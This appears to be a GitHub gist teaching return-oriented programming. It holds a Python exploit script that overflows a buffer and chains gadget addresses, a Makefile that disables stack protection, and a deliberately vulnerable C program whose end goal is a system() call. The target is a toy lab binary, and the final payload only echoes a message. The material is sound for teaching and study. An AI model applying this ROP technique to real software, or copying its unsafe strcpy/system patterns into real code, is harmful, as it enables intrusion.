Skip to content

Instantly share code, notes, and snippets.

@mayanez
Last active November 20, 2024 13:54
Show Gist options
  • Save mayanez/c6bb9f2a26fa75261a9a26a0a637531b to your computer and use it in GitHub Desktop.
Save mayanez/c6bb9f2a26fa75261a9a26a0a637531b to your computer and use it in GitHub Desktop.
Simple ROP Exploit Example (x86)
# NOTE: For Python 2.7
import os
import struct
#Find gadgets
pop_ret = 0x08049ca5 # start address of a pop,ret sequence
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence
lazy = 0x08049b05 # objdump -d | grep lazy
food = 0x08049b30 # objdump -d | grep food
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick
#Buffer Overflow
payload = "A"*0x6c
payload += "BBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
os.system("./simple-rop \"%s\"" % payload)
simple-rop: simple-rop.c
gcc -m32 -O0 -g -static -fno-stack-protector $^ -o $@
.PHONY: clean
clean:
rm -rf simple-rop
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char string[100];
// I might need this later. ¯\_(ツ)_/¯
// I'm not using it so it shouldn't affect anything.
void lazy() {
system(string);
}
void food(int magic) {
printf("THANK YOU!\n");
if (magic == 0xdeadbeef) {
strcat(string, "/bin");
}
}
void feeling_sick(int magic1, int magic2) {
printf("1m f33ling s1cK...\n");
if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) {
strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'");
}
}
void vuln(char *string) {
char buffer[100] = {0};
strcpy(buffer, string); // I don't know any better.
}
int main(int argc, char** argv) {
string[0] = 0;
printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n");
if (argc > 1) {
vuln(argv[1]);
} else {
printf("y0u f0rG0T t0 f33d mE!!!\n");
}
return 0;
}
@EralpCelebi
Copy link

Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it

@mayanez
Copy link
Author

mayanez commented Apr 19, 2019

You should set pop_ret to the address of the sequence in the program.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment